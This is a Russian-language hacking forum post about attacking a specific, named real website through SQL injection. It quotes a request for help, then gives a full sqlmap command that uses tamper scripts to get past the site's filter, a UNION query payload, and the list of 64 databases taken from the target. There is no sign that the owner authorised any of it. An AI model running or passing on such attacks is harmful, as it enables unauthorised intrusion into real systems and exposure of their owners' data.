Показать сообщение отдельно

  #2428  
Старый 22.10.2018, 12:27
lukeone
Новичок
Регистрация: 07.05.2017
Сообщений: 6
Провел на форуме:
2109

Репутация: 1
По умолчанию

Цитата:
Сообщение от sepo  

Всем привет, нашел уязвимый сайт, но вот беда, ни ручками, ни скульмапом инъекцию раскрутить не могу. Есть тут желающии помочь?
Код:
http://www.mscnano.eu/news.php?id=132
Код:
python sqlmap.py -u "http://www.mscnano.eu/news.php?id=" --random-agent --hex --threads 1 --dbs --batch --dbms=mysql --technique=U --level 5 --risk 3 --tamper=space2comment,unmagicquotes,escapequotes,versionedkeywords
.SpoilerTarget" type="button">Spoiler: from sqlmap
---

Parameter: id (GET)

Type: UNION query

Title: MySQL UNION query (NULL) - 8 columns

Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178627871, 0x775a5551695146647647515859656e61626e636765464348 7767764f4e56695a726557454457534a,0x71626b6271),NUL L#

---

available databases [64]:
[*] #mysql50#mysql.old.copia
[*] 2dspm
[*] 3s19
[*] bondslam
[*] cc
[*] cees
[*] cen2018
[*] computing_resources
[*] daqm
[*] dipc
[*] dipc-courses
[*] dipc10
[*] dynapeutics
[*] e2epol
[*] eezz18
[*] etsf
[*] iegr
[*] ii
[*] inelastica
[*] information_schema
[*] interfaces2014
[*] lankor_topa14
[*] leskovsky
[*] limage2018
[*] magnon
[*] modsurf
[*] mysql
[*] n2d
[*] nanoqi
[*] nanoqi16
[*] nanoqi17
[*] ngsces2018
[*] oss
[*] oss18
[*] pecas
[*] pecas2019
[*] pedro
[*] phpmyadmin
[*] polymorphs
[*] prueba
[*] qdp2018
[*] quantumchemphys
[*] quantumdev
[*] sabat2018
[*] scom16
[*] siqew2019
[*] sos2
[*] sos22
[*] test
[*] theobio17
[*] tms17
[*] tmspin
[*] topadipc
[*] topadipc2012
[*] topadipc2014
[*] topadipc2015
[*] topadipc2017
[*] topadipc2018
[*] topadipcOLD
[*] topostates
[*] totalenergy2020
[*] tstutorial
[*] webcc
[*] wikidb

Вся суть в том, что там стоит какой то фильтр, который сбрасывает соединения при "подозрительных запросах", тамперы в sqlmap помогают всё равно)
 
Ответить с цитированием